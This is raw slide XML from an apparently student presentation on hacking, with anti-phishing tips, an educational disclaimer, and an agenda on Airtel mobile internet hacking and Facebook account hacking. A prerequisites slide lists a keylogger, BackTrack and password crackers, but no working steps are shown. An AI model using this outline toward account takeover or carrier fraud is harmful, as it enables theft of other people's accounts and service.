              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>t click on any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>hyperlinks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Facebook </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>which may lead you to a site where you have to use your password to continue further.</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000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>These are some tips to save you from hackers.</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400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>What more may happen?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Who knows may be this moment or tomorrow a device or an innovation may be invented by using which anything can be hacked in seconds including your passwords, your bank account passwords, everything by just looking at you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>face to face</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> even you can hack your ideas in other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>brain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>BRAIN HACKING</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>how man will withstand with his own creation called internet.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Important message:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="1846263" algn="l"/>
                <a:tab pos="2971800" algn="ctr"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Don</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>t try any of these techniques; you may put yourself </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>behind the bars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> if you did any wrong with these hacking methods. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>This is only to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>educate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> about hacking.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="11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6470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50" name="Picture 2" descr="C:\Users\NAWAZ\Desktop\ha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27709"/>
            <a:ext cx="8077199" cy="12628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33024" y="1235104"/>
            <a:ext cx="6277952" cy="4801314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Berlin Sans FB Demi" pitchFamily="34" charset="0"/>
                <a:cs typeface="Aharoni" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Berlin Sans FB Demi" pitchFamily="34" charset="0"/>
                <a:cs typeface="Aharoni" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>this paper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Berlin Sans FB Demi" pitchFamily="34" charset="0"/>
                <a:cs typeface="Aharoni" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Berlin Sans FB Demi" pitchFamily="34" charset="0"/>
                <a:cs typeface="Aharoni" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>present </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Berlin Sans FB Demi" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Berlin Sans FB Demi" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Types </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Recent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trends</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Airtel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mobile internet hacking </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="33CC33"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4. Hacking tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hackers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6. Hacking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7. Comparing8. Conclusion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <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179628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Picture 2" descr="Description: C:\Users\kingkhan\Desktop\Anonymous Exposes Massive Leak of United States Department of Justice - Anonymous Hack Download from the Pirate B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3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NAWAZ\Desktop\Question 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799" y="1219200"/>
            <a:ext cx="6331527" cy="49545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NAWAZ\Desktop\queries-l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28599"/>
            <a:ext cx="37147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5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99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877531" y="1066800"/>
            <a:ext cx="8077200" cy="4462760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Aharoni" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Aharoni" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>PREREQUISITES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Aharoni" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Aharoni" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Aharoni" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Aharoni" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Algerian" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>Android Mobile with Airtel sim.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Algerian" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>PC with backtrack5r3 OS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Algerian" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>A Facebook account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Algerian" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>Emissary Key logger software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Algerian" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>John </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Algerian" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>the Ripper and Cain &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Algerian" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>Abel.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Algerian" pitchFamily="82" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Algerian" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>Working internet connection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="114184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990600" y="685800"/>
            <a:ext cx="4038600" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Berlin Sans FB Demi" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WHO IS A HACKER ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Berlin Sans FB Demi" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="949036" y="1371600"/>
            <a:ext cx="6858000" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A hacker is someone who likes to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tinker</a:t>
            </a:r>
            <a:r>
